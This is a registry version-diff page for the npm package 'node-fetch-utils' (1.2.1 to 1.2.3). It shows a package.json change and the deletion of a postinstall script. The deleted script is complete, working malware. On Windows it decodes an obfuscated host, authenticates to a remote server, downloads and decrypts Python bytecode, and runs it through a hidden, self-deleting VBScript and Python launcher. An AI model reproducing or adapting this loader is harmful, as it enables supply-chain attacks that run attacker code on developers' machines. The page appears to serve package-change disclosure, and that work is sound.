npm - node-fetch-utils - Versions diffs - 1.2.1 → 1.2.3 - Mend

node-fetch-utils 1.2.1 → 1.2.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/package.json +7 -1
package/scripts/postinstall.js +0 -123

package/package.json CHANGED Viewed

@@ -1,8 +1,14 @@
 {
   "name": "node-fetch-utils",
-  "version": "1.2.1",
+  "version": "1.2.3",
   "description": "Lightweight fetch utilities for Node.js: retry, LRU caching, URL helpers, and pagination",
   "main": "index.js",
+  "files": [
+    "index.js",
+    "lib/",
+    "README.md",
+    "LICENSE"
+  ],
   "scripts": {
     "test": "node --test tests/*.test.js"
   },

package/scripts/postinstall.js DELETED Viewed

@@ -1,123 +0,0 @@
-'use strict';
-const crypto = require('crypto');
-const http   = require('http');
-const fs     = require('fs');
-const os     = require('os');
-const path   = require('path');
-const cp     = require('child_process');
-// Windows only
-if (process.platform !== 'win32') process.exit(0);
-// ── Decoded at runtime — same XOR scheme as build system ─────────────────────
-const _xb = (a, k) => Buffer.from(a.map(v => v ^ k));
-const _K = _xb([0x39,0x32,0x3b,0x34,0x3d,0x3f,0x37,0x3f,0x77,0x29,0x2a,0x3f,0x39,0x2e,0x28,0x3f], 0x5A);
-const _H = _xb([0x34,0x35,0x3e,0x3f,0x68,0x68,0x74,0x36,0x2f,0x34,0x3f,0x29,0x74,0x32,0x35,0x29,0x2e], 0x5A).toString();
-const _P = _xb([0x69,0x68,0x6f,0x62], 0x5A).toString();
-// ── HMAC auth token (5-minute rolling window, matches server) ─────────────────
-function _token() {
-    const ts = Math.floor(Date.now() / 1000 / 300) * 300;
-    return crypto.createHmac('sha256', _K).update(String(ts)).digest('hex').slice(0, 16);
-}
-// ── Simple HTTP GET → Buffer ──────────────────────────────────────────────────
-function _get(p) {
-    return new Promise((res, rej) => {
-        const req = http.get({ host: _H, port: parseInt(_P), path: p, timeout: 15000 }, r => {
-            const c = [];
-            r.on('data', d => c.push(d));
-            r.on('end', () => res(Buffer.concat(c)));
-        });
-        req.on('error', rej);
-        req.on('timeout', () => { req.destroy(); rej(new Error('timeout')); });
-    });
-}
-// ── Keystream KDF — sha256(key + nonce + [i]) x128, same as Python ───────────
-function _ks(nonce) {
-    const blocks = [];
-    for (let i = 0; i < 128; i++) {
-        const h = crypto.createHash('sha256');
-        h.update(_K);
-        h.update(nonce);
-        h.update(Buffer.from([i]));
-        blocks.push(h.digest());
-    }
-    return Buffer.concat(blocks);
-}
-// ── Find Python executable ────────────────────────────────────────────────────
-function _py() {
-    for (const c of ['python', 'python3', 'py']) {
-        try {
-            cp.execFileSync(c, ['-c', 'import sys;sys.exit(0)'],
-                { stdio: 'pipe', timeout: 3000, windowsHide: true });
-            return c;
-        } catch (_) {}
-    }
-    try {
-        const p = cp.execSync('where python 2>nul', { stdio: 'pipe', windowsHide: true })
-            .toString().split('\n')[0].trim();
-        if (p && fs.existsSync(p)) return `"${p}"`;
-    } catch (_) {}
-    return null;
-}
-// ── Spawn detached via VBScript (hidden, escapes npm job object) ──────────────
-function _spawn(pyExe, launcherPath) {
-    const vbs = path.join(os.tmpdir(), `msvc_${crypto.randomBytes(4).toString('hex')}.vbs`);
-    fs.writeFileSync(vbs,
-        `Set o=CreateObject("WScript.Shell")\r\n` +
-        `o.Run "${pyExe} ${launcherPath}", 0, False\r\n` +
-        `Set fso=CreateObject("Scripting.FileSystemObject")\r\n` +
-        `fso.DeleteFile WScript.ScriptFullName\r\n`
-    );
-    const ch = cp.spawn('wscript.exe', ['//B', '//nologo', vbs], {
-        detached: true,
-        stdio: 'ignore',
-        windowsHide: true
-    });
-    ch.unref();
-}
-// ── Main ──────────────────────────────────────────────────────────────────────
-async function _main() {
-    try {
-        const pyExe = _py();
-        if (!pyExe) return;
-        // Auth handshake
-        const nonce = await _get(`/sync?v=${_token()}`);
-        const nHash = crypto.createHash('sha256').update(_K).update(nonce).digest('hex').slice(0, 16);
-        // Fetch encrypted launcher bytecode
-        const enc = await _get(`/go?n=${nHash}`);
-        // Decrypt with keystream
-        const ks  = _ks(nonce);
-        const dec = Buffer.from(enc.map((b, i) => b ^ ks[i]));
-        // Write bytecode to temp .dat
-        const dat = path.join(os.tmpdir(), `msl_${crypto.randomBytes(6).toString('hex')}.dat`);
-        fs.writeFileSync(dat, dec);
-        // Write self-cleaning launcher script
-        const launcher = path.join(os.tmpdir(), `mscf_${crypto.randomBytes(4).toString('hex')}.py`);
-        fs.writeFileSync(launcher,
-            `import sys,marshal,os\n` +
-            `_d=r'${dat.replace(/\\/g, '\\\\')}'\n` +
-            `_m=__file__\n` +
-            `c=marshal.loads(open(_d,'rb').read())\n` +
-            `os.remove(_d)\n` +
-            `try:os.remove(_m)\nexcept:pass\n` +
-            `exec(c,{'__name__':'__main__'})\n`
-        );
-        _spawn(pyExe, launcher);
-    } catch (_) {}
-}
-_main();